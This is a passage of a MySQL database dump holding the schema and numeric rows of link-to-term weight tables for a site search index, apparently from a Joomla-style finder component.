74,1.16669),(125,47575,0.32669),(125,47576,0.98),(125,47577,1.05),(125,47578,1.00331),(125,47579,1.09669),(125,47982,0.91),(125,47983,1.05),(125,47984,0.42),(125,47985,1.07331),(125,47986,1.14331),(125,47987,0.95669),(125,47988,1.02669),(125,47989,0.91),(125,47990,1.26),(125,47991,1.12),(125,47992,1.23669),(125,47993,0.23331),(125,47994,0.98),(125,47995,1.05),(125,47996,0.14),(125,47997,0.84),(125,47998,1.00331),(125,47999,0.93331),(125,48000,1.00331),(125,48263,1.00331),(125,48264,0.93331),(125,48265,1.02669),(125,48266,0.0175),(125,48267,0.81669),(125,48268,0.98),(125,48269,0.23331),(125,48270,0.93331),(125,48271,1.07331),(125,48272,0.91),(125,48273,1.05),(125,48274,0.95669),(125,48275,1.14331),(126,48470,0.14),(126,48471,0.86331),(126,48472,0.93331),(126,48473,1.07331),(126,48474,1.26),(126,48475,0.98),(126,48476,1.12),(126,48477,1.14331),(126,48478,1.28331),(126,48479,1.02669),(126,48480,1.14331),(126,48481,0.28),(126,48482,1.05),(126,48483,1.12),(126,48484,0.37331),(126,48485,0.95669),(126,48486,1.07331),(126,48487,0.86331),(126,48488,1.02669),(126,48489,0.37331),(126,48490,1.00331),(126,48491,1.16669),(126,48492,0.51331),(126,48493,1.09669),(126,48494,0.51331),(126,48495,1.26),(126,48496,1.4),(126,48497,1.00331),(126,48498,1.16669),(126,48499,0.93338),(126,48500,1.07331),(126,48501,1.30669),(126,48502,1.12),(126,48503,1.23669),(126,48504,0.32669),(126,48505,0.93331),(126,48506,1.05),(126,48507,0.65338),(126,48508,0.98),(126,48509,1.05),(126,48510,1.00331),(126,48511,1.12),(126,48512,0.23331),(126,48513,0.91),(126,48514,1.07331),(126,48515,0.23331),(126,48516,0.91),(126,48517,1.05),(126,48518,1.16669),(126,48519,0.98),(133,48519,1.96),(126,48520,1.14331),(126,48521,0.18669),(126,48522,0.95669),(126,48523,1.05),(126,48951,0.37331),(126,48952,0.98),(126,48953,1.02669),(126,48954,0.60669),(126,48955,1.12),(126,48956,1.33),(126,48957,0.18669),(126,48958,0.88669),(126,48959,1.00331),(126,48960,0.14),(126,48961,0.88669),(126,48962,0.95669),(126,48963,0.32669),(126,48964,0.95669),(126,48965,1.07331),(126,48966,0.56),(126,48967,1.19),(126,48968,1.33),(126,48969,0.37331),(126,48970,1.05),(126,48971,1.12),(126,48972,0.28),(126,48973,1.00331),(126,48974,1.09669),(126,48975,1.07331),(126,48976,1.28331),(126,48977,0.95669),(126,48978,1.19),(126,48979,0.98),(126,48980,1.16669),(126,48981,0.28),(126,48982,0.93331),(126,48983,1.12),(126,48984,0.32669),(126,48985,0.95669),(126,48986,1.12),(126,48987,0.23331),(126,48988,0.91),(126,48989,0.98),(126,48990,0.88669),(126,48991,1.07331),(126,49271,0.18669),(126,49272,0.93331),(126,49273,1.05),(126,49274,0.91),(126,49275,0.98),(126,49276,0.09331),(126,49277,0.84),(126,49278,0.93331),(128,51216,0.37331),(128,51217,0.95669),(128,51218,1.09669),(128,51219,0.32669),(128,51220,1.00331),(128,51221,1.16669),(128,51222,0.93331),(128,51223,1.07331),(128,51224,0.18669),(128,51225,0.98),(128,51226,1.07331),(128,51227,2.14662),(128,51228,1.07331),(128,51229,1.23669),(128,51230,0.28),(128,51231,1.16669),(128,51232,1.4),(128,51233,1.02669),(128,51234,1.19),(128,51235,1.07331),(128,51236,1.16669),(128,51237,0.42),(128,51238,0.84),(128,51239,0.91),(128,51240,0.84),(128,51241,0.91),(128,51242,0.91),(128,51243,1.07331),(128,51244,0.93331),(128,51245,1.07331),(128,51246,0.32669),(128,51247,0.95669),(128,51248,1.02669),(128,51249,1.30676),(128,51250,1.05),(128,51251,1.19),(128,51252,1.00331),(128,51253,1.07331),(128,51254,2.05338),(128,51255,1.07331),(128,51256,1.14331),(128,51656,1.23669),(128,51657,1.09669),(128,51658,2.33338),(128,51659,1.07331),(128,51660,1.16669),(128,51661,1.12),(128,51662,0.23331),(128,51663,0.88669),(128,51664,0.98),(128,51665,1.02669),(128,51666,1.09669),(128,51667,1.07331),(128,51668,1.23669),(128,51669,0.98),(128,51670,0.42),(128,51671,1.05),(128,51672,1.21331),(128,51673,0.98),(128,51674,1.19),(128,51675,0.91),(128,51676,1.05),(128,51677,0.28),(128,51678,0.98),(128,51679,1.09669),(128,51680,0.23331),(128,51681,0.86331),(128,51682,1.00331),(128,51683,0.28),(128,51684,0.95669),(128,51685,1.00331),(133,52393,0.95669),(133,52394,1.05),(133,52395,0.95669),(133,52396,1.14331),(133,52397,1.09669),(133,52398,1.23669),(133,52399,0.60669),(133,52400,1.14331),(133,52401,1.30669),(133,52402,1.02662),(133,52403,1.12),(133,52404,1.21331),(133,52405,1.21331),(133,52406,1.30669),(133,52407,1.00331),(133,52408,1.09669),(133,52409,2.14662),(133,52410,1.02669),(133,52411,1.26),(133,52506,0.46669),(133,52507,1.23669),(133,52508,1.4),(133,52509,1.14331),(133,52510,0.95669),(133,52511,1.07331),(133,52512,0.37331),(133,52513,0.95669),(133,52514,1.16669),(133,52515,1.16669),(133,52516,1.23669),(134,52609,1.02669),(134,52610,1.09669),(134,52611,0.95669),(134,52612,1.02669),(134,52613,0.98),(134,52614,1.05),(134,52615,1.09669),(134,52616,1.19),(134,52719,1.12),(134,52720,0.98),(134,52721,1.19),(134,52722,0.93331),(134,52723,1.16669),(134,52763,0.95669); /*!40000 ALTER TABLE `fit_finder_links_terms4` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms5` -- DROP TABLE IF EXISTS `fit_finder_links_terms5`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms5` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms5` -- LOCK TABLES `fit_finder_links_terms5` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms5` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms5` VALUES (110,25071,0.18669),(110,25072,0.95669),(110,25073,1.07331); /*!40000 ALTER TABLE `fit_finder_links_terms5` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms6` -- DROP TABLE IF EXISTS `fit_finder_links_terms6`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms6` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms6` -- LOCK TABLES `fit_finder_links_terms6` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms6` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms6` VALUES (3,184,0.23331),(3,185,0.95669),(3,186,1.02669),(3,187,0.23331),(3,188,1.05),(3,189,1.30669),(3,190,0.28),(3,191,1.05),(3,192,1.23669),(128,193,0.18669),(3,193,0.98679),(3,194,4.68679),(3,195,5.30321),(3,196,0.23331),(3,197,0.93331),(3,198,1.02669),(9,511,0.37331),(9,512,1.05),(9,513,1.12),(9,514,0.18669),(105,514,0.18669),(116,514,0.18669),(126,514,0.18669),(134,514,0.18669),(107,514,0.37338),(123,514,0.37338),(120,514,0.56007),(9,515,0.86331),(9,516,0.98),(9,517,0.23331),(104,517,0.23331),(106,517,0.23331),(110,517,0.23331),(112,517,0.23331),(103,517,0.46662),(9,518,0.93331),(9,519,1.05),(9,520,0.23331),(111,520,0.23331),(112,520,0.23331),(117,520,0.23331),(9,521,0.91),(9,522,1.00331),(21,1654,0.28),(35,1654,0.28),(105,1654,0.28),(112,1654,0.28),(120,1654,0.28),(125,1654,0.28),(52,3027,0.18669),(20,3027,0.5334),(21,3036,0.34),(21,3037,0.28),(35,3037,0.56),(21,3038,1.05),(21,3039,1.21331),(35,9579,0.28),(125,9579,0.28),(35,9580,1.09669),(35,9581,1.35331),(35,9582,0.46669),(35,9583,1.02669),(35,9584,1.16669),(112,9585,0.46669),(120,9585,0.46669),(40,9585,0.93338),(133,9585,1.40007),(116,9585,2.46679),(117,9585,2.46679),(123,9585,2.46679),(35,9585,5.60028),(35,9586,1.02669),(35,9587,1.23669),(35,9588,1.05),(35,9589,1.30669),(35,9590,2.14662),(35,9591,2.66),(35,9592,1.21331),(35,9593,1.4),(35,9594,1.07331),(40,9594,1.07331),(35,9595,1.33),(35,9596,2.33338),(35,9597,2.8),(35,9598,1.14331),(35,9599,1.28331),(35,9600,1.14331),(40,9600,1.14331),(123,9600,6.04321),(35,9601,1.26),(35,9602,1.16669),(116,9602,6.16679),(117,9602,6.16679),(35,9603,1.4),(35,9604,1.02669),(35,9605,1.21331),(35,9606,0.28),(35,9607,1.02669),(35,9608,1.12),(35,9609,1.00331),(35,9610,1.28331),(35,9611,0.32669),(40,9611,0.32669),(134,9611,0.65338),(35,9612,1.02669),(35,9613,1.19),(35,9614,0.46669),(35,9615,1.02669),(35,9616,1.16669),(35,9617,0.18669),(35,9618,0.88669),(35,9619,0.95669),(35,9620,0.65338),(35,9621,0.95669),(35,9622,1.14331),(35,9623,0.28),(103,9623,0.28),(120,9623,0.28),(55,9623,1.76),(35,9624,1.02669),(35,9625,1.14331),(35,9626,0.98),(35,9627,1.07331),(35,9628,1.09669),(35,9629,1.26),(52,10637,0.02331),(55,10637,0.02331),(58,10637,0.02331),(68,10637,0.02331),(105,10637,0.02331),(113,10637,0.02331),(116,10637,0.02331),(125,10637,0.02331),(128,10637,0.02331),(117,10637,0.04662),(120,10637,0.04662),(123,10637,0.04662),(103,10637,0.06993),(120,10638,0.91),(40,10860,0.28),(113,10860,0.28),(40,10861,0.91),(40,10862,0.98),(40,10863,1.35331),(40,10864,1.30669),(123,10864,6.90679),(40,10865,1.02669),(40,10866,1.09669),(40,10867,0.18669),(103,10867,0.18669),(40,10868,0.88669),(40,10869,1.26),(40,10870,0.32669),(40,10871,1.09669),(40,10872,1.16669),(55,11555,0.51331),(133,11555,1.02662),(120,11565,0.32669),(133,11565,0.32669),(68,11565,1.72679),(113,11565,1.72679),(52,11573,0.7),(52,11776,0.98),(55,11776,0.98),(58,11776,0.98),(68,11776,0.98),(52,11777,1.37669),(52,11778,1.4),(52,11779,0.7),(52,11780,1.4),(52,11781,1.4),(52,12095,0.23331),(103,12095,0.23331),(52,12210,0.95669),(52,12211,1.12),(52,12212,0.93331),(52,12213,1.09669),(55,12440,0.95669),(55,12441,1.14331),(55,12442,5.30321),(55,12443,6.29),(55,12444,0.37331),(55,12445,0.95669),(55,12446,1.12),(126,12831,0.37331),(110,12831,0.74662),(68,13566,0.56),(68,13567,0.93331),(68,13568,1.16669),(68,13569,1.14331),(68,13570,1.26),(68,13707,4.81),(110,13826,0.23331),(120,13826,0.69993),(110,14129,0.37331),(110,15673,0.09338),(110,15683,0.32669),(103,17021,0.18669),(104,17021,0.18669),(106,17021,0.18669),(107,17021,0.18669),(113,17021,0.18669),(117,17021,0.18669),(119,17021,0.18669),(120,17021,0.18669),(126,17021,0.18669),(112,17021,0.37338),(110,17021,0.93345),(103,17022,0.88669),(103,17023,1.00331),(105,17024,0.37331),(103,17024,1.11993),(103,17025,0.98),(103,17026,1.19),(103,17027,0.95669),(103,17028,1.19),(103,17029,1.14331),(103,17030,1.30669),(103,17031,0.42),(103,17032,0.98),(103,17033,1.07331),(103,17034,0.56007),(110,17034,1.8669),(103,17035,0.91),(103,17036,1.14331),(103,17037,0.98),(103,17038,1.09669),(103,17039,0.93331),(103,17040,1.02669),(103,17041,0.18669),(113,17041,0.18669),(103,17042,0.95669),(103,17043,1.02669),(103,17044,0.23331),(118,17044,0.23331),(120,17044,0.46662),(103,17045,0.98),(103,17046,1.23669),(103,17047,1.00331),(103,17048,1.19),(103,17049,1.02669),(103,17050,1.16669),(126,17051,0.14),(103,17051,0.28),(119,17051,0.28),(103,17052,0.95669),(103,17053,1.02669),(103,17054,0.93331),(103,17055,1.09669),(103,17056,0.42),(110,17056,0.42),(103,17057,1.12),(103,17058,1.26),(103,17059,0.42),(111,17059,0.42),(120,17059,0.42),(128,17059,0.42),(103,17060,1.09669),(103,17061,1.19),(103,17062,0.37331),(103,17063,1.05),(103,17064,1.14331),(103,17065,0.32669),(128,17065,0.32669),(103,17066,0.93331),(103,17067,1.07331),(112,17068,0.14),(113,17068,0.14),(117,17068,0.14),(119,17068,0.14),(123,17068,0.14),(126,17068,0.14),(134,17068,0.14),(105,17068,0.28),(103,17068,0.42),(104,17068,0.42),(110,17068,0.84),(103,17069,0.88669),(103,17070,0.95669),(103,17071,0.86331),(103,17072,1.00331),(103,17073,0.88669),(103,17074,1.09669),(103,17075,0.28),(103,17076,0.93331),(103,17077,1.02669),(103,17078,0.23331),(110,17078,0.46662),(128,17078,0.69993),(103,17079,1.07331),(103,17080,1.26),(103,17081,0.37331),(103,17082,1.02669),(103,17083,1.21331),(103,17084,0.28),(103,17085,0.91),(103,17086,1.00331),(103,17087,0.18669),(103,17088,0.88669),(103,17089,1.07331),(125,17090,0.23331),(103,17090,0.46662),(117,17090,0.69993),(103,17091,0.93331),(103,17092,1.02669),(103,17093,0.95669),(103,17094,1.19),(103,17095,0.56),(123,17095,1.12),(103,17096,1.05),(103,17097,1.19),(103,17098,0.98),(103,17099,1.07331),(103,17100,0.84),(103,17101,1.00331),(103,17102,0.32669),(103,17103,1.07331),(103,17104,1.14331),(103,17105,1.02669),(103,17106,1.14331),(103,17107,0.91),(103,17108,1.00331),(103,17109,1.02669),(103,17110,1.09669),(103,17111,0.32669),(107,17111,0.32669),(125,17111,0.32669),(126,17111,0.65338),(103,17112,0.93331),(103,17113,1.05),(103,17114,0.02331),(117,17114,0.02331),(118,17114,0.02331),(123,17114,0.02331),(106,17114,0.04662),(112,17114,0.04662),(120,17114,0.06993),(107,17114,0.09324),(103,17115,0.86331),(103,17116,0.95669),(103,17117,0.28),(117,17117,0.28),(120,17117,0.28),(103,17118,0.93331),(103,17119,1.07331),(103,17120,0.37338),(103,17121,0.91),(103,17122,1.00331),(103,17123,0.91),(103,17124,0.98),(113,17125,0.18669),(123,17125,0.18669),(103,17125,0.56007),(103,17126,0.91),(103,17127,1.14331),(103,17128,0.95669),(103,17129,1.00331),(103,17130,0.91),(103,17131,1.00331),(103,17132,1.00331),(103,17133,1.09669),(103,17134,0.56),(103,17135,1.23669),(103,17136,1.37669),(103,17137,0.23331),(105,17137,0.23331),(120,17137,0.23331),(103,17138,0.88669),(103,17139,1.02669),(104,17140,0.01169),(105,17140,0.01169),(117,17140,0.01169),(103,17140,0.02338),(112,17140,0.02338),(103,17141,0.91),(103,17142,1.02669),(103,17143,0.91),(103,17144,0.98),(104,18775,0.86331),(104,18776,1.09669),(104,18777,0.91),(104,18778,1.05),(104,18779,0.93338),(104,18780,1.00331),(104,18781,1.09669),(104,18782,1.05),(104,18783,1.19),(104,18784,0.51331),(104,18785,1.05),(104,18786,1.12),(104,18787,0.23331),(104,18788,1.07331),(104,18789,1.19),(104,18790,0.93331),(104,18791,0.98),(104,18792,0.88669),(104,18793,1.00331),(104,18794,0.88669),(104,18795,1.05),(104,18796,0.32669),(118,18796,1.63345),(104,18797,0.98),(104,18798,1.07331),(104,18799,0.18669),(104,18800,0.91),(104,18801,1.00331),(104,18802,0.37331),(104,18803,0.95669),(104,18804,1.07331),(104,18805,0.28),(104,18806,0.91),(104,18807,1.05),(104,18808,0.28),(106,18808,0.28),(110,18808,0.28),(123,18808,0.28),(104,18809,1.05),(104,18810,1.12),(104,18811,0.93338),(104,18812,1.05),(104,18813,1.23669),(104,18814,1.05),(104,18815,1.12),(104,18816,0.86331),(104,18817,0.98),(105,20079,0.95669),(105,20080,1.14331),(105,20081,0.18669),(105,20082,0.93331),(105,20083,1.02669),(105,20084,0.93331),(105,20085,1.09669),(105,20086,0.28),(105,20087,0.93331),(105,20088,1.12),(105,20089,0.23331),(118,20089,0.23331),(105,20090,1.02669),(105,20091,1.12),(105,20092,0.18669),(118,20092,0.18669),(123,20092,0.18669),(125,20092,0.18669),(116,20092,0.37338),(106,20092,1.30683),(105,20093,0.91),(105,20094,1.05),(105,20095,0.91),(105,20096,0.95669),(105,20097,0.42),(105,20098,1.00331),(105,20099,1.28331),(105,20100,0.84),(105,20101,0.95669),(105,20102,0.84),(105,20103,1.00331),(105,20104,0.01169),(106,20104,0.01169),(125,20104,0.01169),(117,20104,0.02338),(112,20104,0.03507),(119,20104,0.03507),(105,20105,0.91),(105,20106,1.02669),(105,20107,0.18669),(117,20107,0.18669),(110,20107,0.37338),(105,20108,0.91),(105,20109,1.05),(105,20110,0.37338),(105,20111,0.86331),(105,20112,1.00331),(105,20113,0.95669),(105,20114,1.02669),(105,20115,0.28),(105,20116,0.88669),(105,20117,1.05),(105,20118,0.28),(105,20119,0.91),(105,20120,1.16669),(105,20121,0.28),(120,20121,0.28),(105,20122,0.93331),(120,20122,0.93331),(105,20123,1.12),(125,20124,0.23331),(105,20124,0.46662),(128,20124,0.46662),(105,20125,1.00331),(105,20126,1.12),(105,20127,0.91),(105,20128,1.09669),(105,20129,0.23331),(105,20130,1.00331),(105,20131,1.07331),(105,20132,0.28),(105,20133,0.98),(105,20134,1.14331),(105,20135,0.23331),(118,20135,0.23331),(119,20135,0.23331),(105,20136,0.88669),(105,20137,1.00331),(105,20138,0.88669),(116,20138,0.88669),(105,20139,1.00331),(105,20140,0.23331),(105,20141,1.02669),(105,20142,1.16669),(105,20143,0.98),(105,20144,1.14331),(105,20145,0.02331),(112,20145,0.02331),(116,20145,0.02331),(110,20145,0.09324),(105,20146,0.91),(116,20146,0.91),(105,20147,0.95669),(105,20148,0.86331),(105,20149,1.00331),(106,21501,0.86331),(106,21502,1.02669),(106,21503,1.02669),(106,21504,1.12),(106,21505,0.88669),(106,21506,1.02669),(106,21507,1.07331),(106,21508,1.30669),(106,21509,1.07331),(106,21510,1.19),(106,21511,0.98),(106,21512,1.21331),(106,21513,0.88669),(106,21514,1.02669),(106,21515,0.95669),(106,21516,1.07331),(106,21517,0.93331),(116,21517,0.93331),(106,21518,1.02669),(106,21519,0.37331),(106,21520,1.09669),(106,21521,1.26),(106,21522,0.32669),(106,21523,1.02669),(106,21524,1.16669),(106,21525,0.32669),(106,21526,0.95669),(106,21527,1.09669),(106,21528,0.81669),(106,21529,0.93331),(106,21530,0.28),(106,21531,1.02669),(106,21532,1.07331),(118,21533,0.14),(106,21533,0.28),(128,21533,1.68),(113,21533,3.78),(106,21534,0.88669),(106,21535,0.95669),(106,21536,0.84),(113,21536,0.84),(106,21537,0.93331),(106,21538,0.37331),(106,21539,0.98),(106,21540,1.09669),(106,21541,0.28),(106,21542,0.88669),(106,21543,1.02669),(106,21544,0.98),(106,21545,1.05),(106,21546,0.28),(106,21547,0.98),(106,21548,1.05),(106,21549,1.91338),(106,21550,2.28662),(106,21551,0.28),(106,21552,0.98),(106,21553,1.07331),(106,21554,0.37338),(106,21555,0.91),(106,21556,1.09669),(106,21557,0.98),(106,21558,1.23669),(107,22655,0.88669),(107,22656,1.14331),(107,22657,1.77338),(107,22658,2.05338),(107,22659,0.56),(107,22660,1.86662),(107,22661,1.07331),(107,22662,1.09669),(107,22663,0.74662),(107,22664,2.00662),(107,22665,2.42662),(120,22666,0.28),(107,22666,0.56),(107,22667,1.96),(107,22668,2.1),(123,22669,0.32669),(125,22669,0.32669),(126,22669,0.32669),(107,22669,0.65338),(107,22670,1.86662),(107,22671,2.1),(107,22672,0.98),(107,22673,1.14331),(107,22674,0.98),(107,22675,1.07331),(107,22676,1.91338),(107,22677,2.28662),(107,22678,1.05),(107,22679,1.14331),(112,22680,0.23331),(107,22680,0.69993),(107,22681,0.98),(107,22682,1.05),(107,22683,1.96),(107,22684,1.12),(107,22685,1.12),(116,23733,0.37331),(114,23736,0.37331),(123,23736,0.37331),(128,23736,0.37331),(110,23736,0.74662),(112,23741,0.84),(119,23741,0.84),(110,23741,1.68),(125,23743,0.32669),(109,24762,0.42),(109,24763,1.07331),(109,24764,1.33),(109,24765,0.37331),(109,24766,0.95669),(109,24767,1.16669),(109,24768,0.23331),(111,24768,0.23331),(114,24768,0.23331),(109,24769,0.98),(109,24770,1.02669),(109,24771,0.32669),(109,24772,0.93331),(109,24773,1.05),(109,24774,0.65338),(109,24775,0.93331),(109,24776,1.16669),(109,24777,1.05),(109,24778,1.16669),(109,24779,0.74662),(109,24780,1.00331),(109,24781,1.16669),(109,24782,1.05),(109,24783,1.12),(110,27227,0.79331),(110,27228,0.84),(110,27229,0.98),(110,27230,1.23669),(110,27231,1.72662),(110,27232,0.95669),(110,27233,1.02669),(110,27234,1.12),(110,27235,1.21331),(110,27236,0.88669),(110,27237,0.98),(110,27238,0.88669),(110,27239,0.98),(110,27240,1.02669),(110,27241,1.09669),(110,27242,0.88669),(110,27243,1.02669),(110,27244,0.86331),(110,27245,0.95669),(110,27246,0.98),(110,27247,1.07331),(110,27248,0.86331),(110,27249,1.05),(110,27250,1.02669),(110,27251,1.23669),(110,27252,0.86331),(110,27253,1.00331),(110,27254,0.88669),(110,27255,1.00331),(110,27256,0.93331),(110,27257,1.02669),(110,27258,0.88669),(110,27259,1.00331),(110,27260,0.65338),(110,27261,1.05),(110,27262,1.23669),(110,27263,1.02669),(110,27264,1.09669),(110,27265,0.37331),(120,27265,0.37331),(110,27266,0.95669),(110,27267,1.05),(110,27268,0.88669),(110,27269,0.98),(110,27270,0.93331),(110,27271,1.12),(110,27272,0.28),(116,27272,0.28),(110,27273,0.93331),(110,27274,1.05),(110,27275,0.18669),(110,27276,0.93331),(110,27277,1.16669),(110,27278,0.95669),(110,27279,1.14331),(110,27280,0.28),(117,27280,0.28),(110,27281,1.09669),(110,27282,1.16669),(110,27283,1.02669),(110,27284,1.16669),(110,27285,1.02669),(110,27286,1.19),(110,27287,1.23669),(110,27288,1.4),(113,27289,0.42),(118,27289,0.42),(125,27289,0.42),(110,27289,0.84),(110,27290,0.98),(110,27291,1.19),(110,27292,1.02669),(110,27293,1.21331),(110,27294,0.18669),(110,27295,0.93331),(110,27296,1.12),(117,27297,0.28),(118,27297,0.28),(110,27297,0.56),(110,27298,1.02669),(110,27299,1.09669),(110,27300,0.98),(110,27301,1.09669),(110,27302,0.91),(110,27303,0.98),(110,27304,1.02669),(110,27305,1.05),(110,27306,1.07331),(110,27307,1.26),(110,27308,0.91),(110,27309,1.09669),(110,27310,1.07331),(110,27311,1.16669),(110,27312,0.88669),(110,27313,0.98),(110,27314,0.95669),(110,27315,1.05),(110,27316,0.32669),(110,27317,0.93331),(110,27318,1.14331),(110,27319,1.82),(110,27320,2.1),(110,27321,1.00331),(110,27322,1.12),(110,27323,0.23331),(110,27324,0.93331),(110,27325,1.19),(110,27326,0.28),(110,27327,1.07331),(110,27328,1.14331),(110,27329,0.23331),(119,27329,0.23331),(110,27330,0.95669),(110,27331,1.07331),(110,27332,0.18669),(110,27333,0.88669),(110,27334,1.00331),(110,27335,0.56),(110,27336,1.05),(110,27337,1.14331),(110,27338,0.74662),(110,27339,0.95669),(110,27340,1.09669),(110,27341,1.07331),(110,27342,1.23669),(110,27343,0.37331),(110,27344,0.95669),(110,27345,1.02669),(110,27346,0.28),(110,27347,0.91),(110,27348,1.00331),(110,27349,1.05),(110,27350,1.26),(110,27351,0.28),(110,27352,0.93331),(110,27353,1.14331),(110,27354,0.93331),(110,27355,1.05),(110,27356,1.02669),(110,27357,1.16669),(110,27358,0.14),(111,27358,0.14),(110,27359,0.86331),(110,27360,0.95669),(110,27361,0.93331),(110,27362,1.19),(110,27363,0.95669),(110,27364,1.05),(110,27365,0.93331),(110,27366,1.09669),(110,27367,0.93331),(110,27368,1.05),(121,30990,0.09331),(114,30990,0.27993),(111,30990,0.55986),(111,30991,0.91),(111,30992,1.02669),(111,30993,0.79331),(111,30994,1.00331),(111,30995,0.84),(111,30996,0.91),(111,30997,0.88669),(111,30998,0.98),(111,30999,1.68),(111,31000,0.91),(111,31001,0.98),(111,31002,0.37331),(111,31003,1.12),(111,31004,1.26),(111,31005,1.68),(111,31006,0.91),(111,31007,0.95669),(111,31008,0.88669),(111,31009,1.12),(111,31010,0.93331),(111,31011,1.12),(111,31012,0.95669),(111,31013,1.12),(111,31014,0.98),(111,31015,1.37669),(111,31016,1.09669),(111,31017,1.37669),(111,31018,0.98007),(111,31019,1.12),(111,31020,1.16669),(111,31021,1.02669),(111,31022,1.14331),(111,31023,0.93331),(111,31024,1.07331),(111,31025,1.00331),(111,31026,1.23669),(111,31027,0.23331),(111,31028,0.88669),(111,31029,1.00331),(111,31030,0.93331),(111,31031,1.00331),(111,31032,0.23331),(111,31033,1.12),(111,31034,1.19),(111,31035,0.23331),(111,31036,1.00331),(111,31037,1.07331),(111,31038,0.56),(111,31039,0.98),(111,31040,1.16669),(111,31041,0.93331),(111,31042,1.02669),(111,31043,0.46662),(111,31044,0.98),(111,31045,1.37669),(111,31046,0.91),(111,31047,0.98),(111,31048,0.51331),(111,31049,1.05),(111,31050,1.23669),(111,31051,0.32669),(111,31052,1.09669),(111,31053,1.14331),(111,31054,1.30676),(111,31055,0.95669),(111,31056,1.05),(111,31057,1.00331),(111,31058,1.23669),(111,31059,0.95669),(111,31060,1.12),(111,31061,0.95669),(111,31062,1.12),(111,31063,0.37331),(111,31064,0.98),(111,31065,1.09669),(111,31066,0.37331),(111,31067,0.93331),(111,31068,1.00331),(111,31069,1.86655),(111,31070,0.95669),(111,31071,1.00331),(111,31072,0.95669),(111,31073,1.19),(111,31074,1.09669),(111,31075,1.26),(111,31076,1.02669),(111,31077,1.19),(111,31078,0.95669),(111,31079,1.07331),(111,31080,0.65338),(111,31081,0.93331),(111,31082,1.16669),(111,31083,0.95669),(111,31084,1.12),(111,31085,1.00331),(111,31086,1.14331),(114,31087,0.18669),(111,31087,0.37338),(111,31088,1.68),(111,31089,1.82),(111,31090,0.32669),(111,31091,0.91),(111,31092,1.05),(121,31093,0.23331),(111,31093,0.69993),(111,31094,1.00331),(111,31095,1.09669),(111,31096,1.05),(111,31097,1.09669),(111,31098,1.02669),(111,31099,1.33),(111,31100,0.37331),(111,31101,1.02669),(111,31102,1.30669),(111,31103,0.69993),(111,31104,0.91),(111,31105,1.09669),(111,31106,0.91),(111,31107,1.16669),(111,31108,1.05),(111,31109,1.19),(111,31110,0.37331),(111,31111,0.93331),(111,31112,1.14331),(116,31113,0.28),(111,31113,0.84),(111,31114,0.98),(111,31115,1.12),(111,31116,0.88669),(111,31117,1.16669),(111,31118,1.07331),(111,31119,1.21331),(111,31120,0.81669),(111,31121,0.86331),(112,32901,0.37331),(112,32902,1.07331),(112,32903,1.33),(112,32904,0.42),(112,32905,1.07331),(112,32906,1.23669),(112,32907,1.40007),(112,32908,1.09669),(112,32909,1.4),(112,32910,1.09669),(112,32911,1.26),(112,32912,1.02669),(112,32913,1.23669),(112,32914,0.88669),(112,32915,0.93331),(112,32916,0.93331),(112,32917,1.02669),(112,32918,0.93331),(112,32919,1.02669),(112,32920,1.21331),(112,32921,1.33),(112,32922,0.37331),(112,32923,0.98),(112,32924,1.09669),(112,32925,1.14331),(112,32926,1.33),(112,32927,0.32669),(112,32928,0.93331),(112,32929,1.12),(112,32930,0.18669),(112,32931,0.93331),(112,32932,1.07331),(112,32933,1.00331),(112,32934,0.79331),(117,32934,0.79331),(112,32935,0.88669),(112,32936,0.81669),(112,32937,0.86331),(112,32938,0.91),(112,32939,0.95669),(112,32940,0.93331),(112,32941,1.02669),(112,32942,0.46669),(112,32943,1.00331),(112,32944,1.14331),(112,32945,0.28),(112,32946,1.05),(112,32947,1.21331),(112,32948,1.02669),(112,32949,1.21331),(112,32950,0.93331),(112,32951,1.07331),(112,32952,0.98),(112,32953,1.09669),(112,32954,0.86331),(112,32955,0.93331),(112,32956,0.86331),(112,32957,0.91),(112,32958,0.86331),(112,32959,0.93331),(113,34229,0.88669),(113,34230,0.98),(113,34231,1.05),(113,34232,1.19),(113,34233,0.91),(113,34234,1.02669),(113,34235,0.56),(121,34235,0.56),(123,34235,0.56),(113,34236,1.09669),(113,34237,1.23669),(113,34238,0.32669),(113,34239,1.00331),(113,34240,1.16669),(113,34241,1.05),(113,34242,1.14331),(113,34243,0.86331),(113,34244,0.93331),(113,34245,0.42),(113,34246,1.02669),(113,34247,1.12),(113,34248,0.81669),(128,34248,0.81669),(113,34249,0.98),(113,34250,0.86331),(113,34251,0.98),(113,34252,0.95669),(113,34253,1.09669),(113,34254,0.98),(113,34255,1.21331),(113,34256,0.98),(113,34257,1.09669),(113,34258,0.86331),(128,34258,0.86331),(113,34259,1.12),(113,34260,0.93331),(113,34261,0.98),(113,34262,0.84),(113,34263,1.05),(113,34264,0.88669),(113,34265,0.95669),(113,34266,0.86331),(113,34267,0.95669),(113,34268,0.91),(113,34269,1.05),(113,34270,0.98),(113,34271,1.09669),(128,34272,1.63338),(113,34272,4.08345),(128,34273,1.00331),(113,34273,2.00662),(113,34274,1.00331),(113,34275,0.98),(113,34276,1.00331),(113,34277,0.98),(113,34278,1.05),(113,34279,0.93331),(113,34280,1.00331),(113,34281,0.91),(113,34282,0.98),(113,34283,0.91),(113,34284,1.02669),(113,34285,0.88669),(113,34286,0.98),(113,34287,0.93331),(113,